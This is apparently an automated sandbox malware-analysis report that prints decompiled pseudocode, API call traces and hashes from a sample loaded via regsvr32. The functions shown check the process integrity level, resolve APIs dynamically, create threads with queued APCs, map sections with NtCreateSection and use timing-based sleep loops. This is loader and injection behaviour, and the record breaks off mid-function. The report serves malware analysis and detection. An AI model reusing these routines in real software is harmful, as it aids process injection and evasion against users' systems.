                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: HeapName$AllocateComputerFreeUser
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3239747167-0
                                                                                                                                                                                                                                    • Opcode ID: acd8223239fc4f40963a1a1ab600af1aeb99d99046c2c5b95131d22676e8bf91
                                                                                                                                                                                                                                    • Instruction ID: ad2849ecc76eed9fefae63795b1e717372afb59d3819a96473c3ad0128ab8fa1
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: acd8223239fc4f40963a1a1ab600af1aeb99d99046c2c5b95131d22676e8bf91
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 44310CB2A5020AEFDF21DF65D881A6EB7FDEF44300F144829E805DB291DB70ED598B10
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E023E924F(long* _a4) {
                                                                                                                                                                                                                                    				long _v8;
                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                    				void _v16;
                                                                                                                                                                                                                                    				long _v20;
                                                                                                                                                                                                                                    				int _t33;
                                                                                                                                                                                                                                    				void* _t46;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_v16 = 1;
                                                                                                                                                                                                                                    				_v20 = 0x2000;
                                                                                                                                                                                                                                    				if( *0x23ed25c > 5) {
                                                                                                                                                                                                                                    					_v16 = 0;
                                                                                                                                                                                                                                    					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
                                                                                                                                                                                                                                    						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
                                                                                                                                                                                                                                    						_v8 = 0;
                                                                                                                                                                                                                                    						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
                                                                                                                                                                                                                                    						if(_v8 != 0) {
                                                                                                                                                                                                                                    							_t46 = E023E2049(_v8);
                                                                                                                                                                                                                                    							if(_t46 != 0) {
                                                                                                                                                                                                                                    								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
                                                                                                                                                                                                                                    								if(_t33 != 0) {
                                                                                                                                                                                                                                    									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								E023E9039(_t46);
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						CloseHandle(_v12);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				 *_a4 = _v20;
                                                                                                                                                                                                                                    				return _v16;
                                                                                                                                                                                                                                    			}










                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 023E9281
                                                                                                                                                                                                                                    • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 023E92A1
                                                                                                                                                                                                                                    • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 023E92B1
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 023E9301
                                                                                                                                                                                                                                      • Part of subcall function 023E2049: RtlAllocateHeap.NTDLL(00000000,00000000,023E7E50), ref: 023E2055
                                                                                                                                                                                                                                    • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 023E92D4
                                                                                                                                                                                                                                    • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 023E92DC
                                                                                                                                                                                                                                    • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 023E92EC
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1295030180-0
                                                                                                                                                                                                                                    • Opcode ID: dbed3c85313098e2919d73ce816faebe3c98b31c72a4a0e742e2cfda4896273e
                                                                                                                                                                                                                                    • Instruction ID: f3bfe80cd2520e2029649a5e334222b76a7a8bed6f0dadcd0db3bd6f8baf0fc7
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dbed3c85313098e2919d73ce816faebe3c98b31c72a4a0e742e2cfda4896273e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C52119B590021DFFEF219F94DC84EAEBB7DEB48304F000466E911A6190C7719E19EB60
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 230 23e163f-23e168b SysAllocString 231 23e17af-23e17b2 230->231 232 23e1691-23e16bd 230->232 233 23e17bd-23e17c0 231->233 234 23e17b4-23e17b7 SafeArrayDestroy 231->234 238 23e17ac 232->238 239 23e16c3-23e16cf call 23e2436 232->239 236 23e17cb-23e17d2 233->236 237 23e17c2-23e17c5 SysFreeString 233->237 234->233 237->236 238->231 239->238 242 23e16d5-23e16e5 239->242 242->238 244 23e16eb-23e1711 IUnknown_QueryInterface_Proxy 242->244 244->238 246 23e1717-23e172b 244->246 248 23e172d-23e1730 246->248 249 23e1769-23e176c 246->249 248->249 250 23e1732-23e1749 StrStrIW 248->250 251 23e176e-23e1773 249->251 252 23e17a3-23e17a8 249->252 253 23e174b-23e1754 call 23e52f9 250->253 254 23e1760-23e1763 SysFreeString 250->254 251->252 255 23e1775-23e1780 call 23e1a70 251->255 252->238 253->254 261 23e1756-23e175e call 23e2436 253->261 254->249 258 23e1785-23e1789 255->258 258->252 260 23e178b-23e1790 258->260 262 23e179e 260->262 263 23e1792-23e179c 260->263 261->254 262->252 263->252
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 023E1680
                                                                                                                                                                                                                                    • IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,?), ref: 023E1702
                                                                                                                                                                                                                                    • StrStrIW.SHLWAPI(?,006E0069), ref: 023E1741
                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 023E1763
                                                                                                                                                                                                                                      • Part of subcall function 023E52F9: SysAllocString.OLEAUT32(023EC2B0), ref: 023E5349
                                                                                                                                                                                                                                    • SafeArrayDestroy.OLEAUT32(?), ref: 023E17B7
                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 023E17C5
                                                                                                                                                                                                                                      • Part of subcall function 023E2436: Sleep.KERNELBASE(000001F4), ref: 023E247E
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2118684380-0
                                                                                                                                                                                                                                    • Opcode ID: dee7d28f7ca5baf9320087475702dfc283b1c8051f5d2dd5138dc859ddaada13
                                                                                                                                                                                                                                    • Instruction ID: 99131b32fab9b48b8ac5d1526e1d2fcc14f0cc8ec6e3db7dff310fdfc6d656b4
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dee7d28f7ca5baf9320087475702dfc283b1c8051f5d2dd5138dc859ddaada13
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 85514176900219EFCF10DFE8C8848AEB7BAFF88744B158829E546EB250D731AD49CF51
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 266 26d1a0f-26d1a21 call 26d1de1 269 26d1a27-26d1a5c GetModuleHandleA GetProcAddress 266->269 270 26d1ae2 266->270 272 26d1a5e-26d1a72 GetProcAddress 269->272 273 26d1ada-26d1ae0 call 26d1dfc 269->273 271 26d1ae9-26d1af0 270->271 272->273 275 26d1a74-26d1a88 GetProcAddress 272->275 273->271 275->273 276 26d1a8a-26d1a9e GetProcAddress 275->276 276->273 278 26d1aa0-26d1ab4 GetProcAddress 276->278 278->273 279 26d1ab6-26d1ac7 call 26d1eb5 278->279 281 26d1acc-26d1ad1 279->281 281->273 282 26d1ad3-26d1ad8 281->282 282->271
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E026D1A0F(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                    				_Unknown_base(*)()* _t29;
                                                                                                                                                                                                                                    				_Unknown_base(*)()* _t33;
                                                                                                                                                                                                                                    				_Unknown_base(*)()* _t36;
                                                                                                                                                                                                                                    				_Unknown_base(*)()* _t39;
                                                                                                                                                                                                                                    				_Unknown_base(*)()* _t42;
                                                                                                                                                                                                                                    				intOrPtr _t46;
                                                                                                                                                                                                                                    				struct HINSTANCE__* _t50;
                                                                                                                                                                                                                                    				intOrPtr _t56;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t56 = E026D1DE1(0x20);
                                                                                                                                                                                                                                    				if(_t56 == 0) {
                                                                                                                                                                                                                                    					_v8 = 8;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_t50 = GetModuleHandleA( *0x26d4150 + 0x26d5014);
                                                                                                                                                                                                                                    					_v8 = 0x7f;
                                                                                                                                                                                                                                    					_t29 = GetProcAddress(_t50,  *0x26d4150 + 0x26d5151);
                                                                                                                                                                                                                                    					 *(_t56 + 0xc) = _t29;
                                                                                                                                                                                                                                    					if(_t29 == 0) {
                                                                                                                                                                                                                                    						L8:
                                                                                                                                                                                                                                    						E026D1DFC(_t56);
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t33 = GetProcAddress(_t50,  *0x26d4150 + 0x26d5161);
                                                                                                                                                                                                                                    						 *(_t56 + 0x10) = _t33;
                                                                                                                                                                                                                                    						if(_t33 == 0) {
                                                                                                                                                                                                                                    							goto L8;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_t36 = GetProcAddress(_t50,  *0x26d4150 + 0x26d5174);
                                                                                                                                                                                                                                    							 *(_t56 + 0x14) = _t36;
                                                                                                                                                                                                                                    							if(_t36 == 0) {
                                                                                                                                                                                                                                    								goto L8;
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								_t39 = GetProcAddress(_t50,  *0x26d4150 + 0x26d5189);
                                                                                                                                                                                                                                    								 *(_t56 + 0x18) = _t39;
                                                                                                                                                                                                                                    								if(_t39 == 0) {
                                                                                                                                                                                                                                    									goto L8;
                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                    									_t42 = GetProcAddress(_t50,  *0x26d4150 + 0x26d519f);
                                                                                                                                                                                                                                    									 *(_t56 + 0x1c) = _t42;
                                                                                                                                                                                                                                    									if(_t42 == 0) {
                                                                                                                                                                                                                                    										goto L8;
                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                    										 *((intOrPtr*)(_t56 + 8)) = _a8;
                                                                                                                                                                                                                                    										 *((intOrPtr*)(_t56 + 4)) = _a4;
                                                                                                                                                                                                                                    										_t46 = E026D1EB5(_t56, _a12); // executed
                                                                                                                                                                                                                                    										_v8 = _t46;
                                                                                                                                                                                                                                    										if(_t46 != 0) {
                                                                                                                                                                                                                                    											goto L8;
                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                    											 *_a16 = _t56;
                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _v8;
                                                                                                                                                                                                                                    			}













                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 026D1DE1: HeapAlloc.KERNEL32(00000000,?,026D1556,00000208,00000000,00000000,?,?,?,026D16A9,?), ref: 026D1DED
                                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,026D1E4D,?,?,?,?,?,00000002,?,026D1401), ref: 026D1A33
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 026D1A55
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 026D1A6B
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 026D1A81
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 026D1A97
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 026D1AAD
                                                                                                                                                                                                                                      • Part of subcall function 026D1EB5: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,76D24EE0,00000000,00000000,?), ref: 026D1F12
                                                                                                                                                                                                                                      • Part of subcall function 026D1EB5: memset.NTDLL ref: 026D1F34
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.522835823.00000000026D0000.00000040.00020000.sdmp, Offset: 026D0000, based on PE: true
• Associated: 00000002.00000002.523067360.00000000026D5000.00000040.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_26d0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1632424568-0
                                                                                                                                                                                                                                    • Opcode ID: b9dadfafa5c804cd065873f90106f49d60a1ae18e31c526c5641a585f9adfd68
                                                                                                                                                                                                                                    • Instruction ID: b4438699aae255629519e8275e89e3df423ef3a1eba9dab73d0e447b00b1f814
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b9dadfafa5c804cd065873f90106f49d60a1ae18e31c526c5641a585f9adfd68
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 242104B1E0160EAFD710DFA9DC84EAA7BF8EF4934470544A5E90AD7345E771EA01CBA0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 283 26d1afa-26d1b0e 284 26d1b7f-26d1b8c InterlockedDecrement 283->284 285 26d1b10-26d1b11 283->285 286 26d1bcc-26d1bd3 284->286 287 26d1b8e-26d1b94 284->287 285->286 288 26d1b17-26d1b24 InterlockedIncrement 285->288 289 26d1b96 287->289 290 26d1bc0-26d1bc6 HeapDestroy 287->290 288->286 291 26d1b2a-26d1b3e HeapCreate 288->291 294 26d1b9b-26d1bab SleepEx 289->294 290->286 292 26d1b7a-26d1b7d 291->292 293 26d1b40-26d1b71 call 26d15ee call 26d12dc 291->293 292->286 293->286 301 26d1b73-26d1b76 293->301 296 26d1bad-26d1bb2 294->296 297 26d1bb4-26d1bba CloseHandle 294->297 296->294 296->297 297->290 301->292
                                                                                                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                                                                                                    			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                    				long _v8;
                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                    				void* __ebp;
                                                                                                                                                                                                                                    				char _t9;
                                                                                                                                                                                                                                    				void* _t10;
                                                                                                                                                                                                                                    				void* _t18;
                                                                                                                                                                                                                                    				void* _t23;
                                                                                                                                                                                                                                    				void* _t36;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                                                    				_t9 = _a8;
                                                                                                                                                                                                                                    				_v8 = 1;
                                                                                                                                                                                                                                    				if(_t9 == 0) {
                                                                                                                                                                                                                                    					_t10 = InterlockedDecrement(0x26d4108);
                                                                                                                                                                                                                                    					__eflags = _t10;
                                                                                                                                                                                                                                    					if(_t10 == 0) {
                                                                                                                                                                                                                                    						__eflags =  *0x26d410c;
                                                                                                                                                                                                                                    						if( *0x26d410c != 0) {
                                                                                                                                                                                                                                    							_t36 = 0x2328;
                                                                                                                                                                                                                                    							while(1) {
                                                                                                                                                                                                                                    								SleepEx(0x64, 1);
                                                                                                                                                                                                                                    								__eflags =  *0x26d4118;
                                                                                                                                                                                                                                    								if( *0x26d4118 == 0) {
                                                                                                                                                                                                                                    									break;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								_t36 = _t36 - 0x64;
                                                                                                                                                                                                                                    								__eflags = _t36;
                                                                                                                                                                                                                                    								if(_t36 > 0) {
                                                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								break;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							CloseHandle( *0x26d410c);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						HeapDestroy( *0x26d4110);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					if(_t9 == 1 && InterlockedIncrement(0x26d4108) == 1) {
                                                                                                                                                                                                                                    						_t18 = HeapCreate(0, 0x400000, 0); // executed
                                                                                                                                                                                                                                    						_t41 = _t18;
                                                                                                                                                                                                                                    						 *0x26d4110 = _t18;
                                                                                                                                                                                                                                    						if(_t18 == 0) {
                                                                                                                                                                                                                                    							L6:
                                                                                                                                                                                                                                    							_v8 = 0;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							 *0x26d4130 = _a4;
                                                                                                                                                                                                                                    							asm("lock xadd [eax], edi");
                                                                                                                                                                                                                                    							_push( &_a8);
                                                                                                                                                                                                                                    							_t23 = E026D12DC(E026D111A, E026D15EE(_a12, 1, 0x26d4118, _t41));
                                                                                                                                                                                                                                    							 *0x26d410c = _t23;
                                                                                                                                                                                                                                    							if(_t23 == 0) {
                                                                                                                                                                                                                                    								asm("lock xadd [esi], eax");
                                                                                                                                                                                                                                    								goto L6;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _v8;
                                                                                                                                                                                                                                    			}












                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(026D4108), ref: 026D1B1C
                                                                                                                                                                                                                                    • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 026D1B31
                                                                                                                                                                                                                                      • Part of subcall function 026D12DC: CreateThread.KERNEL32(00000000,00000000,00000000,?,026D4118,026D1B6A), ref: 026D12F3
                                                                                                                                                                                                                                      • Part of subcall function 026D12DC: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 026D1308
                                                                                                                                                                                                                                      • Part of subcall function 026D12DC: GetLastError.KERNEL32(00000000), ref: 026D1313
                                                                                                                                                                                                                                      • Part of subcall function 026D12DC: TerminateThread.KERNEL32(00000000,00000000), ref: 026D131D
                                                                                                                                                                                                                                      • Part of subcall function 026D12DC: CloseHandle.KERNEL32(00000000), ref: 026D1324
                                                                                                                                                                                                                                      • Part of subcall function 026D12DC: SetLastError.KERNEL32(00000000), ref: 026D132D
                                                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(026D4108), ref: 026D1B84
                                                                                                                                                                                                                                    • SleepEx.KERNEL32(00000064,00000001), ref: 026D1B9E
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32 ref: 026D1BBA
                                                                                                                                                                                                                                    • HeapDestroy.KERNEL32 ref: 026D1BC6
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.522835823.00000000026D0000.00000040.00020000.sdmp, Offset: 026D0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.523067360.00000000026D5000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_26d0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2110400756-0
                                                                                                                                                                                                                                    • Opcode ID: 63c0e4fd349d22efe6ddc7d9d86f7b4ac5e0d969009fde8d844eddda844a7673
                                                                                                                                                                                                                                    • Instruction ID: c84fa3e3fe32771f01315ef89359eeebe9905d484c66eb849a998c8ab0fb3f95
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 63c0e4fd349d22efe6ddc7d9d86f7b4ac5e0d969009fde8d844eddda844a7673
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F2219335E4120DAFD7109F6DEC84E2D7BA5FB7626474458A9F409E3240EBB08DA0CF51
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    C-Code - Quality: 74%
                                                                                                                                                                                                                                    			E023E6A56(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                                                    				struct _FILETIME _v12;
                                                                                                                                                                                                                                    				void* _t10;
                                                                                                                                                                                                                                    				void* _t12;
                                                                                                                                                                                                                                    				int _t14;
                                                                                                                                                                                                                                    				signed int _t16;
                                                                                                                                                                                                                                    				void* _t18;
                                                                                                                                                                                                                                    				signed int _t19;
                                                                                                                                                                                                                                    				unsigned int _t23;
                                                                                                                                                                                                                                    				void* _t26;
                                                                                                                                                                                                                                    				signed int _t33;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t26 = __edx;
                                                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                                                    				_t10 = HeapCreate(0, 0x400000, 0); // executed
                                                                                                                                                                                                                                    				 *0x23ed238 = _t10;
                                                                                                                                                                                                                                    				if(_t10 != 0) {
                                                                                                                                                                                                                                    					 *0x23ed1a8 = GetTickCount();
                                                                                                                                                                                                                                    					_t12 = E023E8F10(_a4);
                                                                                                                                                                                                                                    					if(_t12 == 0) {
                                                                                                                                                                                                                                    						do {
                                                                                                                                                                                                                                    							GetSystemTimeAsFileTime( &_v12);
                                                                                                                                                                                                                                    							_t14 = SwitchToThread();
                                                                                                                                                                                                                                    							_t23 = _v12.dwHighDateTime;
                                                                                                                                                                                                                                    							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 7;
                                                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                                                    							_push(9);
                                                                                                                                                                                                                                    							_push(_t23 >> 7);
                                                                                                                                                                                                                                    							_push(_t16);
                                                                                                                                                                                                                                    							L023EB226();
                                                                                                                                                                                                                                    							_t33 = _t14 + _t16;
                                                                                                                                                                                                                                    							_t18 = E023E7E03(_a4, _t33);
                                                                                                                                                                                                                                    							_t19 = 2;
                                                                                                                                                                                                                                    							_t25 = _t33;
                                                                                                                                                                                                                                    							Sleep(_t19 << _t33); // executed
                                                                                                                                                                                                                                    						} while (_t18 == 1);
                                                                                                                                                                                                                                    						if(E023E6B96(_t25) != 0) {
                                                                                                                                                                                                                                    							 *0x23ed260 = 1; // executed
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t12 = E023E225B(_t26); // executed
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_t12 = 8;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _t12;
                                                                                                                                                                                                                                    			}














                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,023E807D,?), ref: 023E6A69
                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 023E6A7D
                                                                                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,023E807D,?), ref: 023E6A99
                                                                                                                                                                                                                                    • SwitchToThread.KERNEL32(?,00000001,?,?,?,023E807D,?), ref: 023E6A9F
                                                                                                                                                                                                                                    • _aullrem.NTDLL(?,?,00000009,00000000), ref: 023E6ABC
                                                                                                                                                                                                                                    • Sleep.KERNELBASE(00000002,00000000,?,00000001,?,?,?,023E807D,?), ref: 023E6AD6
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 507476733-0
                                                                                                                                                                                                                                    • Opcode ID: 3322521493d8dc678d78d8057a811453f31c34a1b54cda9c60d124d8e9c1ea5d
                                                                                                                                                                                                                                    • Instruction ID: d65d25fad09f481b236fc223447c9947c906d913cd18b58cfaf2a5a88eff7b28
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3322521493d8dc678d78d8057a811453f31c34a1b54cda9c60d124d8e9c1ea5d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 231186F2E90214EFEF34AB64EC0AB5E769D9B44750F104929F946DA1C0E7B0D8588A61
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E026D12DC(long _a4, DWORD* _a12) {
                                                                                                                                                                                                                                    				_Unknown_base(*)()* _v0;
                                                                                                                                                                                                                                    				void* _t4;
                                                                                                                                                                                                                                    				long _t6;
                                                                                                                                                                                                                                    				long _t11;
                                                                                                                                                                                                                                    				void* _t13;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x26d414c, 0, _a12); // executed
